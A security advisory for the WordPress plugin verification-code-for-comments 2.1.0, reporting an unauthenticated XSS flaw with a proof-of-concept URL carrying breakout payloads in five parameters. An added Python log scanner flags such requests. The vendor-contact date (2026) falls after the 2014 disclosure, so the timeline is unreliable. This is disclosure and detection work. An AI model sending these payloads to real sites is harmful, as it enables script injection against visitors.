wp-plugin : verification-code-for-comments – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : verification-code-for-comments

 

Affected Version : 2.1.0 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/verification-code-for-comments/vcc.js.php?vp=vp’>// &vs=vs’>// &l=l’>// &vu=vu’>// &vm=vm’>// &

 

Vulnerable Parameters : vp,vs,l,vu,vm
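
For defenders reviewing web server logs, this added example (not part of the original advisory or of the plugin) flags requests to the endpoint above whose vp, vs, l, vu or vm values contain characters that can break out of an HTML or JavaScript context. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names come from the advisory above.
ENDPOINT = "/wp-content/plugins/verification-code-for-comments/vcc.js.php"
PARAMS = {"vp", "vs", "l", "vu", "vm"}
# Characters that can close an HTML attribute/tag or a JavaScript string.
BREAKOUT = re.compile(r"[<>\"'`\\]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2014:10:00:01 +0000] "GET /wp-content/plugins/'
    'verification-code-for-comments/vcc.js.php?vp=abc&vs=1&l=en HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Jun/2014:10:00:07 +0000] "GET /wp-content/plugins/'
    'verification-code-for-comments/vcc.js.php?vp=vp%27%3E&l=l%27%3E HTTP/1.1" 200 530',
    '203.0.113.9 - - [12/Jun/2014:10:00:09 +0000] "GET /index.php?vp=%27%3E HTTP/1.1" 200 9000',
]


def suspicious_params(log_line):
    """Return the sorted vulnerable parameter names whose decoded value
    contains a breakout character, or [] if the line is not of interest."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not unquote(url.path).endswith(ENDPOINT):
        return []
    hits = set()
    # parse_qsl percent-decodes values, so %27 and %3E are caught as ' and >.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in PARAMS and BREAKOUT.search(value):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Return (line_number, parameter_names) for every flagged log line."""
    flagged = []
    for number, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            flagged.append((number, hits))
    return flagged
```

Values that are percent-encoded twice (for example `%2527`) are decoded only once here, so decode again before matching if your stack does so.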

 

Disclosure Timeline

 

Vendor Contacted : 2026-01-15

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4565

 
Plugin Description :
 
Add a verification code when a user posts a comment to keep robots away. You can use an image verification code or a math equation instead.

Robots may post lots of spam comments into your database. You can add a verification code image or a math equation to avoid this.

Features:

* You can choose a verification code image or a math equation as you wish
* You don't need to edit any source code of WP, you just need to activate the plugin
